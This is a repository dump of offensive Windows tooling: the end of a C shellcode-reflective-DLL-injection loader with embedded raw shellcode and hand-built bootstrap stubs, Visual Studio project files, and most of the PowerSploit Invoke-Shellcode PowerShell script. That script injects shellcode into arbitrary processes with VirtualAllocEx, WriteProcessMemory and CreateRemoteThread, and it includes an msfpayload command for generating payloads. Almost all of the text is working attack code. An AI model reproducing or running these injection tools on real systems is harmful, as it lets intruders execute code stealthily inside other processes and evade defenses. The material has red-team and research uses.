A\x48\x03\xC3\x44\x8B\x04\x88\x4C\x03\xC3\xF6\x85\xD8\x00\x00\x00\x08\x74\x0E\x48\x8B\x8D\xD0\x00\x00\x00\xBA\x08\x00\x00\x00\xEB\x0D\x8B\x95\xC8\x00\x00\x00\x48\x8B\x8D\xC0\x00\x00\x00\x41\xFF\xD0\x48\x8B\xC3\xEB\x02\x33\xC0\x48\x8B\x9C\x24\xB0\x01\x00\x00\x48\x81\xC4\x70\x01\x00\x00\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x5F\x5E\x5D\xC3\x48\x8B\xC4\x48\x89\x58\x08\x48\x89\x68\x10\x48\x89\x70\x18\x48\x89\x78\x20\x41\x56\x48\x83\xEC\x10\x65\x48\x8B\x04\x25\x60\x00\x00\x00\x8B\xE9\x45\x33\xF6\x48\x8B\x50\x18\x4C\x8B\x52\x10\x4D\x8B\x42\x30\x4D\x85\xC0\x0F\x84\xB7\x00\x00\x00\x41\x0F\x10\x42\x58\x49\x63\x40\x3C\x41\x8B\xD6\x4D\x8B\x12\xF3\x0F\x7F\x04\x24\x46\x8B\x9C\x00\x88\x00\x00\x00\x45\x85\xDB\x74\xD2\x48\x8B\x04\x24\x48\xC1\xE8\x10\x66\x44\x3B\xF0\x73\x22\x48\x8B\x4C\x24\x08\x44\x0F\xB7\xC8\x0F\xBE\x01\xC1\xCA\x0D\x80\x39\x61\x7C\x03\x83\xC2\xE0\x03\xD0\x48\xFF\xC1\x49\x83\xE9\x01\x75\xE7\x4B\x8D\x3C\x18\x44\x8B\x4F\x18\x8B\x47\x20\x41\xFF\xC9\x49\x03\xC0\x4A\x8D\x34\x88\xEB\x28\x8B\x1E\x45\x8B\xDE\x49\x03\xD8\x48\x8D\x76\xFC\x0F\xBE\x0B\x48\xFF\xC3\x41\xC1\xCB\x0D\x44\x03\xD9\x84\xC9\x75\xEF\x41\x8D\x04\x13\x3B\xC5\x74\x0E\x41\xFF\xC9\x41\x83\xF9\x01\x77\xD2\xE9\x58\xFF\xFF\xFF\x8B\x47\x24\x43\x8D\x0C\x09\x49\x03\xC0\x0F\xB7\x14\x01\x8B\x4F\x1C\x49\x03\xC8\x8B\x04\x91\x49\x03\xC0\xEB\x02\x33\xC0\x48\x8B\x5C\x24\x20\x48\x8B\x6C\x24\x28\x48\x8B\x74\x24\x30\x48\x8B\x7C\x24\x38\x48\x83\xC4\x10\x41\x5E\xC3";
111 | DWORD rdiShellcode32Length = 2981, rdiShellcode64Length = 2772;
112 | //MARKER:E
113 | #endif
114 |
115 | if (Is64BitDLL((UINT_PTR)inBytes))
116 | {
117 |
118 | rdiShellcode = rdiShellcode64;
119 | rdiShellcodeLength = rdiShellcode64Length;
120 |
121 | if (rdiShellcode == NULL || rdiShellcodeLength == 0) return 0;
122 |
123 | BYTE bootstrap[69] = { 0 };
124 | DWORD i = 0;
125 |
126 | // call next instruction (Pushes next instruction address to stack)
127 | bootstrap[i++] = 0xe8;
128 | bootstrap[i++] = 0x00;
129 | bootstrap[i++] = 0x00;
130 | bootstrap[i++] = 0x00;
131 | bootstrap[i++] = 0x00;
132 |
133 | // Set the offset to our DLL from pop result
134 | dllOffset = sizeof(bootstrap) - i + rdiShellcodeLength;
135 |
136 | // pop rcx - Capture our current location in memory
137 | bootstrap[i++] = 0x59;
138 |
139 | // mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
140 | bootstrap[i++] = 0x49;
141 | bootstrap[i++] = 0x89;
142 | bootstrap[i++] = 0xc8;
143 |
144 | // mov edx,
145 | bootstrap[i++] = 0xba;
146 | MoveMemory(bootstrap + i, &userFunction, sizeof(userFunction));
147 | i += sizeof(userFunction);
148 |
149 | // Setup the location of our user data
150 | // add r8, +
151 | bootstrap[i++] = 0x49;
152 | bootstrap[i++] = 0x81;
153 | bootstrap[i++] = 0xc0;
154 | userDataLocation = dllOffset + length;
155 | MoveMemory(bootstrap + i, &userDataLocation, sizeof(userDataLocation));
156 | i += sizeof(userDataLocation);
157 |
158 | // mov r9d,
159 | bootstrap[i++] = 0x41;
160 | bootstrap[i++] = 0xb9;
161 | MoveMemory(bootstrap + i, &userLength, sizeof(userLength));
162 | i += sizeof(userLength);
163 |
164 | // push rsi - save original value
165 | bootstrap[i++] = 0x56;
166 |
167 | // mov rsi, rsp - store our current stack pointer for later
168 | bootstrap[i++] = 0x48;
169 | bootstrap[i++] = 0x89;
170 | bootstrap[i++] = 0xe6;
171 |
172 | // and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
173 | bootstrap[i++] = 0x48;
174 | bootstrap[i++] = 0x83;
175 | bootstrap[i++] = 0xe4;
176 | bootstrap[i++] = 0xf0;
177 |
178 | // sub rsp, 0x30 - Create some breathing room on the stack
179 | bootstrap[i++] = 0x48;
180 | bootstrap[i++] = 0x83;
181 | bootstrap[i++] = 0xec;
182 | bootstrap[i++] = 6 * 8; // 32 bytes for shadow space + 16 bytes for last args
183 |
184 | // mov qword ptr [rsp + 0x28], rcx (shellcode base) - Push in arg 5
185 | bootstrap[i++] = 0x48;
186 | bootstrap[i++] = 0x89;
187 | bootstrap[i++] = 0x4C;
188 | bootstrap[i++] = 0x24;
189 | bootstrap[i++] = 5 * 8;
190 |
191 | // add rcx,
192 | bootstrap[i++] = 0x48;
193 | bootstrap[i++] = 0x81;
194 | bootstrap[i++] = 0xc1;
195 | MoveMemory(bootstrap + i, &dllOffset, sizeof(dllOffset));
196 | i += sizeof(dllOffset);
197 |
198 | // mov dword ptr [rsp + 0x20], - Push arg 6 just above shadow space
199 | bootstrap[i++] = 0xC7;
200 | bootstrap[i++] = 0x44;
201 | bootstrap[i++] = 0x24;
202 | bootstrap[i++] = 4 * 8;
203 | MoveMemory(bootstrap + i, &flags, sizeof(flags));
204 | i += sizeof(flags);
205 |
206 | // call - Transfer execution to the RDI
207 | bootstrap[i++] = 0xe8;
208 | bootstrap[i++] = sizeof(bootstrap) - i - 4; // Skip over the remainder of instructions
209 | bootstrap[i++] = 0x00;
210 | bootstrap[i++] = 0x00;
211 | bootstrap[i++] = 0x00;
212 |
213 | // mov rsp, rsi - Reset our original stack pointer
214 | bootstrap[i++] = 0x48;
215 | bootstrap[i++] = 0x89;
216 | bootstrap[i++] = 0xf4;
217 |
218 | // pop rsi - Put things back where we left them
219 | bootstrap[i++] = 0x5e;
220 |
221 | // ret - return to caller
222 | bootstrap[i++] = 0xc3;
223 |
224 | // Ends up looking like this in memory:
225 | // Bootstrap shellcode
226 | // RDI shellcode
227 | // DLL bytes
228 | // User data
229 | outLength = length + userLength + rdiShellcodeLength + sizeof(bootstrap);
230 | outBytes = (LPSTR)malloc(outLength);
231 | MoveMemory(outBytes, bootstrap, sizeof(bootstrap));
232 | MoveMemory(outBytes + sizeof(bootstrap), rdiShellcode, rdiShellcodeLength);
233 | MoveMemory(outBytes + sizeof(bootstrap) + rdiShellcodeLength, inBytes, length);
234 | MoveMemory(outBytes + sizeof(bootstrap) + rdiShellcodeLength + length, userData, userLength);
235 |
236 | }
237 | else { // 32 bit
238 |
239 | rdiShellcode = rdiShellcode32;
240 | rdiShellcodeLength = rdiShellcode32Length;
241 |
242 | if (rdiShellcode == NULL || rdiShellcodeLength == 0) return 0;
243 |
244 | BYTE bootstrap[50] = { 0 };
245 | DWORD i = 0;
246 |
247 | // call next instruction (Pushes next instruction address to stack)
248 | bootstrap[i++] = 0xe8;
249 | bootstrap[i++] = 0x00;
250 | bootstrap[i++] = 0x00;
251 | bootstrap[i++] = 0x00;
252 | bootstrap[i++] = 0x00;
253 |
254 | // Set the offset to our DLL from pop result
255 | dllOffset = sizeof(bootstrap) - i + rdiShellcodeLength;
256 |
257 | // pop eax - Capture our current location in memory
258 | bootstrap[i++] = 0x58;
259 |
260 | // push ebp
261 | bootstrap[i++] = 0x55;
262 |
263 | // move ebp, esp
264 | bootstrap[i++] = 0x89;
265 | bootstrap[i++] = 0xe5;
266 |
267 | // mov edx, eax - copy our location in memory to ebx before we start modifying eax
268 | bootstrap[i++] = 0x89;
269 | bootstrap[i++] = 0xc2;
270 |
271 | // add edx, +
272 | bootstrap[i++] = 0x81;
273 | bootstrap[i++] = 0xc2;
274 | userDataLocation = dllOffset + length;
275 | MoveMemory(bootstrap + i, &userDataLocation, sizeof(userDataLocation));
276 | i += sizeof(userDataLocation);
277 |
278 | // push
279 | bootstrap[i++] = 0x68;
280 | MoveMemory(bootstrap + i, &flags, sizeof(flags));
281 | i += sizeof(flags);
282 |
283 | // push eax
284 | bootstrap[i++] = 0x50;
285 |
286 | // push
287 | bootstrap[i++] = 0x68;
288 | MoveMemory(bootstrap + i, &userLength, sizeof(userLength));
289 | i += sizeof(userLength);
290 |
291 | // push edx
292 | bootstrap[i++] = 0x52;
293 |
294 | // push
295 | bootstrap[i++] = 0x68;
296 | MoveMemory(bootstrap + i, &userFunction, sizeof(userFunction));
297 | i += sizeof(userFunction);
298 |
299 | // add eax,
300 | bootstrap[i++] = 0x05;
301 | MoveMemory(bootstrap + i, &dllOffset, sizeof(dllOffset));
302 | i += sizeof(dllOffset);
303 |
304 | // push eax
305 | bootstrap[i++] = 0x50;
306 |
307 | // call - Transfer execution to the RDI
308 | bootstrap[i++] = 0xe8;
309 | bootstrap[i++] = sizeof(bootstrap) - i - 4; // Skip the remainder of instructions
310 | bootstrap[i++] = 0x00;
311 | bootstrap[i++] = 0x00;
312 | bootstrap[i++] = 0x00;
313 |
314 | // add esp, 0x14 - clean up stack from args (cdecl)
315 | bootstrap[i++] = 0x83;
316 | bootstrap[i++] = 0xc4;
317 | bootstrap[i++] = 0x14;
318 |
319 | // leave
320 | bootstrap[i++] = 0xc9;
321 |
322 | // ret - return to caller
323 | bootstrap[i++] = 0xc3;
324 |
325 | // Ends up looking like this in memory:
326 | // Bootstrap shellcode
327 | // RDI shellcode
328 | // DLL bytes
329 | // User data
330 | outLength = length + userLength + rdiShellcodeLength + sizeof(bootstrap);
331 | outBytes = (LPSTR)malloc(outLength);
332 | MoveMemory(outBytes, bootstrap, sizeof(bootstrap));
333 | MoveMemory(outBytes + sizeof(bootstrap), rdiShellcode, rdiShellcodeLength);
334 | MoveMemory(outBytes + sizeof(bootstrap) + rdiShellcodeLength, inBytes, length);
335 | MoveMemory(outBytes + sizeof(bootstrap) + rdiShellcodeLength + length, userData, userLength);
336 | }
337 |
338 | return true;
339 | }
340 |
341 | typedef UINT_PTR(WINAPI * RDI)();
342 | typedef void(WINAPI * Function)();
343 | typedef BOOL(__cdecl * EXPORTEDFUNCTION)(LPVOID, DWORD);
344 |
345 | int main(int argc, char *argv[], char *envp[])
346 | {
347 | LPSTR finalShellcode = NULL, data = NULL;
348 | DWORD finalSize, dataSize;
349 | DWORD dwOldProtect1 = 0;
350 | SYSTEM_INFO sysInfo;
351 |
352 | // For any MessageBox testing in the blob
353 | HMODULE test = LoadLibraryA("User32.dll");
354 |
355 | if (argc < 2) {
356 | printf("\n[!] Usage:\n\n\tNativeLoader.exe \n\tNativeLoader.exe \n");
357 | return 0;
358 | }
359 | if (!GetFileContents(argv[1], &data, dataSize)) {
360 | printf("\n[!] Failed to load file\n");
361 | return 0;
362 | }
363 |
364 | if (data[0] == 'M' && data[1] == 'Z') {
365 | printf("[+] File is a DLL, attempting to convert\n");
366 |
367 | if (!ConvertToShellcode(data, dataSize, HashFunctionName("SayHello"), "dave", 5, SRDI_CLEARHEADER, finalShellcode, finalSize)) {
368 | printf("[!] Failed to convert DLL\n");
369 | return 0;
370 | }
371 |
372 | printf("[+] Successfully Converted\n");
373 | }
374 | else {
375 | finalShellcode = data;
376 | finalSize = dataSize;
377 | }
378 |
379 | GetNativeSystemInfo(&sysInfo);
380 |
381 | // Only set the first page to RWX
382 | // This is should sufficiently cover the sRDI shellcode up top
383 | if (VirtualProtect(finalShellcode, sysInfo.dwPageSize, PAGE_EXECUTE_READWRITE, &dwOldProtect1)) {
384 | RDI rdi = (RDI)(finalShellcode);
385 |
386 | printf("[+] Executing RDI\n");
387 | HMODULE hLoadedDLL = (HMODULE)rdi(); // Excute DLL
388 |
389 | free(finalShellcode); // Free the RDI blob. We no longer need it.
390 |
391 | Function exportedFunction = (Function)GetProcAddressR(hLoadedDLL, "Uninstall");
392 | if (exportedFunction) {
393 | printf("[+] Calling exported functon\n");
394 | exportedFunction();
395 | }
396 | }
397 |
398 | return 0;
399 | }
400 |
401 |
--------------------------------------------------------------------------------
/Native/Native.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {68293519-3053-4AB6-921F-9690E2E1487F}
23 | Win32Proj
24 | RDIShellcodeCLoader
25 | 10.0
26 | Native
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | true
78 |
79 |
80 | false
81 |
82 |
83 | false
84 |
85 |
86 |
87 |
88 |
89 | Level3
90 | Disabled
91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | MultiThreadedDebug
93 |
94 |
95 | Console
96 | true
97 |
98 |
99 | copy /y "$(TargetPath)" "$(SolutionDir)bin\NativeLoader_x86.exe"
100 |
101 |
102 |
103 |
104 |
105 |
106 | Level3
107 | Disabled
108 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
109 | MultiThreadedDebug
110 |
111 |
112 | Console
113 | true
114 |
115 |
116 | copy /y "$(TargetPath)" "$(SolutionDir)bin\NativeLoader_x64.exe"
117 |
118 |
119 |
120 |
121 | Level3
122 |
123 |
124 | MaxSpeed
125 | true
126 | true
127 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
128 |
129 |
130 | Console
131 | true
132 | true
133 | true
134 |
135 |
136 | copy /y "$(TargetPath)" "$(SolutionDir)bin\NativeLoader_x86.exe"
137 |
138 |
139 |
140 |
141 | Level3
142 |
143 |
144 | MaxSpeed
145 | true
146 | true
147 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
148 |
149 |
150 | Console
151 | true
152 | true
153 | true
154 |
155 |
156 | copy /y "$(TargetPath)" "$(SolutionDir)bin\NativeLoader_x64.exe"
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
--------------------------------------------------------------------------------
/Native/Native.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Native/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // RDIShellcodeCLoader.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Native/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/Native/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/PowerShell/Invoke-Shellcode.ps1:
--------------------------------------------------------------------------------
1 | function Invoke-Shellcode
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
7 |
8 | PowerSploit Function: Invoke-Shellcode
9 | Author: Matthew Graeber (@mattifestation)
10 | License: BSD 3-Clause
11 | Required Dependencies: None
12 | Optional Dependencies: None
13 |
14 | .DESCRIPTION
15 |
16 | Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre
17 |
18 | PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):
19 |
20 | msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
21 |
22 | Make sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode. It's entirely unnecessary.
23 |
24 | .PARAMETER ProcessID
25 |
26 | Process ID of the process you want to inject shellcode into.
27 |
28 | .PARAMETER Shellcode
29 |
30 | Specifies an optional shellcode passed in as a byte array
31 |
32 | .PARAMETER Force
33 |
34 | Injects shellcode without prompting for confirmation. By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.
35 |
36 | .EXAMPLE
37 |
38 | C:\PS> Invoke-Shellcode -ProcessId 4274
39 |
40 | Description
41 | -----------
42 | Inject shellcode into process ID 4274.
43 |
44 | .EXAMPLE
45 |
46 | C:\PS> Invoke-Shellcode
47 |
48 | Description
49 | -----------
50 | Inject shellcode into the running instance of PowerShell.
51 |
52 | .EXAMPLE
53 |
54 | C:\PS> Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3)
55 |
56 | Description
57 | -----------
58 | Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET)
59 | Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit!
60 | #>
61 |
62 | [CmdletBinding( DefaultParameterSetName = 'RunLocal', SupportsShouldProcess = $True , ConfirmImpact = 'High')] Param (
63 | [ValidateNotNullOrEmpty()]
64 | [UInt16]
65 | $ProcessID,
66 |
67 | [Parameter( ParameterSetName = 'RunLocal' )]
68 | [ValidateNotNullOrEmpty()]
69 | [Byte[]]
70 | $Shellcode,
71 |
72 | [Switch]
73 | $Force = $False
74 | )
75 |
76 | Set-StrictMode -Version 2.0
77 |
78 | if ( $PSBoundParameters['ProcessID'] )
79 | {
80 | # Ensure a valid process ID was provided
81 | # This could have been validated via 'ValidateScript' but the error generated with Get-Process is more descriptive
82 | Get-Process -Id $ProcessID -ErrorAction Stop | Out-Null
83 | }
84 |
85 | function Local:Get-DelegateType
86 | {
87 | Param
88 | (
89 | [OutputType([Type])]
90 |
91 | [Parameter( Position = 0)]
92 | [Type[]]
93 | $Parameters = (New-Object Type[](0)),
94 |
95 | [Parameter( Position = 1 )]
96 | [Type]
97 | $ReturnType = [Void]
98 | )
99 |
100 | $Domain = [AppDomain]::CurrentDomain
101 | $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
102 | $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
103 | $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
104 | $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
105 | $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
106 | $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
107 | $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
108 | $MethodBuilder.SetImplementationFlags('Runtime, Managed')
109 |
110 | Write-Output $TypeBuilder.CreateType()
111 | }
112 |
113 | function Local:Get-ProcAddress
114 | {
115 | Param
116 | (
117 | [OutputType([IntPtr])]
118 |
119 | [Parameter( Position = 0, Mandatory = $True )]
120 | [String]
121 | $Module,
122 |
123 | [Parameter( Position = 1, Mandatory = $True )]
124 | [String]
125 | $Procedure
126 | )
127 |
128 | # Get a reference to System.dll in the GAC
129 | $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
130 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
131 | $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
132 | # Get a reference to the GetModuleHandle and GetProcAddress methods
133 | $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
134 | $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);
135 | # Get a handle to the module specified
136 | $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
137 | $tmpPtr = New-Object IntPtr
138 | $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
139 |
140 | # Return the address of the function
141 | Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
142 | }
143 |
144 | # Emits a shellcode stub that when injected will create a thread and pass execution to the main shellcode payload
145 | function Local:Emit-CallThreadStub ([IntPtr] $BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Architecture)
146 | {
147 | $IntSizePtr = $Architecture / 8
148 |
149 | function Local:ConvertTo-LittleEndian ([IntPtr] $Address)
150 | {
151 | $LittleEndianByteArray = New-Object Byte[](0)
152 | $Address.ToString("X$($IntSizePtr*2)") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $LittleEndianByteArray += [Byte] ('0x{0}' -f $_) } }
153 | [System.Array]::Reverse($LittleEndianByteArray)
154 |
155 | Write-Output $LittleEndianByteArray
156 | }
157 |
158 | $CallStub = New-Object Byte[](0)
159 |
160 | if ($IntSizePtr -eq 8)
161 | {
162 | [Byte[]] $CallStub = 0x48,0xB8 # MOV QWORD RAX, &shellcode
163 | $CallStub += ConvertTo-LittleEndian $BaseAddr # &shellcode
164 | $CallStub += 0xFF,0xD0 # CALL RAX
165 | $CallStub += 0x6A,0x00 # PUSH BYTE 0
166 | $CallStub += 0x48,0xB8 # MOV QWORD RAX, &ExitThread
167 | $CallStub += ConvertTo-LittleEndian $ExitThreadAddr # &ExitThread
168 | $CallStub += 0xFF,0xD0 # CALL RAX
169 | }
170 | else
171 | {
172 | [Byte[]] $CallStub = 0xB8 # MOV DWORD EAX, &shellcode
173 | $CallStub += ConvertTo-LittleEndian $BaseAddr # &shellcode
174 | $CallStub += 0xFF,0xD0 # CALL EAX
175 | $CallStub += 0x6A,0x00 # PUSH BYTE 0
176 | $CallStub += 0xB8 # MOV DWORD EAX, &ExitThread
177 | $CallStub += ConvertTo-LittleEndian $ExitThreadAddr # &ExitThread
178 | $CallStub += 0xFF,0xD0 # CALL EAX
179 | }
180 |
181 | Write-Output $CallStub
182 | }
183 |
184 | function Local:Inject-RemoteShellcode ([Int] $ProcessID)
185 | {
186 | # Open a handle to the process you want to inject into
187 | $hProcess = $OpenProcess.Invoke(0x001F0FFF, $false, $ProcessID) # ProcessAccessFlags.All (0x001F0FFF)
188 |
189 | if (!$hProcess)
190 | {
191 | Throw "Unable to open a process handle for PID: $ProcessID"
192 | }
193 |
194 | $IsWow64 = $false
195 |
196 | if ($64bitOS) # Only perform theses checks if CPU is 64-bit
197 | {
198 | # Determine if the process specified is 32 or 64 bit
199 | $IsWow64Process.Invoke($hProcess, [Ref] $IsWow64) | Out-Null
200 |
201 | if ((!$IsWow64) -and $PowerShell32bit)
202 | {
203 | Throw 'Shellcode injection targeting a 64-bit process from 32-bit PowerShell is not supported. Use the 64-bit version of Powershell if you want this to work.'
204 | }
205 | elseif ($IsWow64) # 32-bit Wow64 process
206 | {
207 | if ($Shellcode32.Length -eq 0)
208 | {
209 | Throw 'No shellcode was placed in the $Shellcode32 variable!'
210 | }
211 |
212 | $Shellcode = $Shellcode32
213 | Write-Verbose 'Injecting into a Wow64 process.'
214 | Write-Verbose 'Using 32-bit shellcode.'
215 | }
216 | else # 64-bit process
217 | {
218 | if ($Shellcode64.Length -eq 0)
219 | {
220 | Throw 'No shellcode was placed in the $Shellcode64 variable!'
221 | }
222 |
223 | $Shellcode = $Shellcode64
224 | Write-Verbose 'Using 64-bit shellcode.'
225 | }
226 | }
227 | else # 32-bit CPU
228 | {
229 | if ($Shellcode32.Length -eq 0)
230 | {
231 | Throw 'No shellcode was placed in the $Shellcode32 variable!'
232 | }
233 |
234 | $Shellcode = $Shellcode32
235 | Write-Verbose 'Using 32-bit shellcode.'
236 | }
237 |
238 | # Reserve and commit enough memory in remote process to hold the shellcode
239 | $RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)
240 |
241 | if (!$RemoteMemAddr)
242 | {
243 | Throw "Unable to allocate shellcode memory in PID: $ProcessID"
244 | }
245 |
246 | Write-Verbose "Shellcode memory reserved at 0x$($RemoteMemAddr.ToString("X$([IntPtr]::Size*2)"))"
247 |
248 | # Copy shellcode into the previously allocated memory
249 | $WriteProcessMemory.Invoke($hProcess, $RemoteMemAddr, $Shellcode, $Shellcode.Length, [Ref] 0) | Out-Null
250 |
251 | # Get address of ExitThread function
252 | $ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread
253 |
254 | if ($IsWow64)
255 | {
256 | # Build 32-bit inline assembly stub to call the shellcode upon creation of a remote thread.
257 | $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 32
258 |
259 | Write-Verbose 'Emitting 32-bit assembly call stub.'
260 | }
261 | else
262 | {
263 | # Build 64-bit inline assembly stub to call the shellcode upon creation of a remote thread.
264 | $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 64
265 |
266 | Write-Verbose 'Emitting 64-bit assembly call stub.'
267 | }
268 |
269 | # Allocate inline assembly stub
270 | $RemoteStubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reserve|Commit, RWX)
271 |
272 | if (!$RemoteStubAddr)
273 | {
274 | Throw "Unable to allocate thread call stub memory in PID: $ProcessID"
275 | }
276 |
277 | Write-Verbose "Thread call stub memory reserved at 0x$($RemoteStubAddr.ToString("X$([IntPtr]::Size*2)"))"
278 |
279 | # Write 32-bit assembly stub to remote process memory space
280 | $WriteProcessMemory.Invoke($hProcess, $RemoteStubAddr, $CallStub, $CallStub.Length, [Ref] 0) | Out-Null
281 |
282 | # Execute shellcode as a remote thread
283 | $ThreadHandle = $CreateRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $RemoteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)
284 |
285 | if (!$ThreadHandle)
286 | {
287 | Throw "Unable to launch remote thread in PID: $ProcessID"
288 | }
289 |
290 | # Close process handle
291 | $CloseHandle.Invoke($hProcess) | Out-Null
292 |
293 | Write-Verbose 'Shellcode injection complete!'
294 | }
295 |
296 | function Local:Inject-LocalShellcode
297 | {
298 | if ($PowerShell32bit) {
299 | if ($Shellcode32.Length -eq 0)
300 | {
301 | Throw 'No shellcode was placed in the $Shellcode32 variable!'
302 | return
303 | }
304 |
305 | $Shellcode = $Shellcode32
306 | Write-Verbose 'Using 32-bit shellcode.'
307 | }
308 | else
309 | {
310 | if ($Shellcode64.Length -eq 0)
311 | {
312 | Throw 'No shellcode was placed in the $Shellcode64 variable!'
313 | return
314 | }
315 |
316 | $Shellcode = $Shellcode64
317 | Write-Verbose 'Using 64-bit shellcode.'
318 | }
319 |
320 | # Allocate RWX memory for the shellcode
321 | $BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)
322 | if (!$BaseAddress)
323 | {
324 | Throw "Unable to allocate shellcode memory in PID: $ProcessID"
325 | }
326 |
327 | Write-Verbose "Shellcode memory reserved at 0x$($BaseAddress.ToString("X$([IntPtr]::Size*2)"))"
328 |
329 | # Copy shellcode to RWX buffer
330 | [System.Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $BaseAddress, $Shellcode.Length)
331 |
332 | # Get address of ExitThread function
333 | $ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread
334 |
335 | if ($PowerShell32bit)
336 | {
337 | $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 32
338 |
339 | Write-Verbose 'Emitting 32-bit assembly call stub.'
340 | }
341 | else
342 | {
343 | $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 64
344 |
345 | Write-Verbose 'Emitting 64-bit assembly call stub.'
346 | }
347 |
